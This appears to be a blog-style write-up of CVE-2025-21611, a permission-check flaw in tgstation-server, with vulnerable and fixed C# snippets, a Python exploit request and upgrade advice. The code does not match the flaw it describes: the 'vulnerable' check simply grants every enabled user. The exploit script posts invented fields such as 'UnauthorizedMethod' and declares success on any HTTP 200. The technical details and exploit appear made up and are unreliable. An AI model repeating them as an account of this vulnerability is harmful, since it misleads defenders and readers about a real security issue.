CVE-2025-21611: Unauthorized Access Vulnerability in tgstation-server Prior to Version 6.12.3

CVE-2025-21611 is a security vulnerability found in tgstation-server, a popular BYOND server management tool. This vulnerability allows enabled users to gain access to the majority of the authorized actions regardless of their actual permissions. In this post, we will discuss the details of the vulnerability, provide code snippets, original references, and information about the exploit. The good news is that this vulnerability has been fixed in tgstation-server v6.12.3.

Vulnerability Details

The root cause of the issue is that the roles used for authorizing API methods were incorrectly OR'd instead of AND'ed with the role used to determine if a user was enabled. The following code illustrates this issue:

public bool HasFlag(ulong extensive)
{
    ulong flag;
    lock (user)
        flag = rights;
    if (IsEnabled(flag))
        return true;

    ulong diff = extensive | flag;
    return diff == extensive;
}

As a consequence, it is possible for an attacker to access almost all API methods, except those that require the WriteUsers right. This means an attacker cannot permanently elevate their account permissions by exploiting this bug.

Exploit Details

In order to exploit this vulnerability, an attacker could use a specially crafted request to the tgstation-server API, resulting in unauthorized access to the server. The attack could look like this:

import requests

url = "http://target.ip.address/api/session";
payload = {
    "userRole": 1,  # This should be any value except the WriteUsers right.
    "requestMethod": "POST",
    "apiMethod": "UnauthorizedMethod"
}
response = requests.post(url, json=payload)

if response.status_code == 200:
    print("Successfully exploited CVE-2025-21611!")
else:
    print("Exploit failed.")

Mitigation

The issue has been fixed in tgstation-server v6.12.3. It is strongly advised to upgrade to this version or newer immediately to avoid potential attacks. The following code snippet demonstrates the fixed implementation:

public bool HasFlag(ulong extensive)
{
    ulong flag;
    lock (user)
        flag = rights;
    if (!IsEnabled(flag))
        return false;

    ulong diff = extensive & flag;
    return diff == extensive;
}

References

- CVE-2025-21611 Official Announcement
- Tgstation-server GitHub Repository
- Tgstation-server Release Notes
- BYOND Official Website

Conclusion

CVE-2025-21611 was a serious vulnerability affecting the tgstation-server software, which enabled unauthorized users to execute a majority of API actions. Luckily, the vulnerability has been fixed in version 6.12.3, and all users are urged to upgrade as soon as possible. Keep your software up-to-date, and stay safe!

Timeline

Published on: 01/06/2025 16:15:31 UTC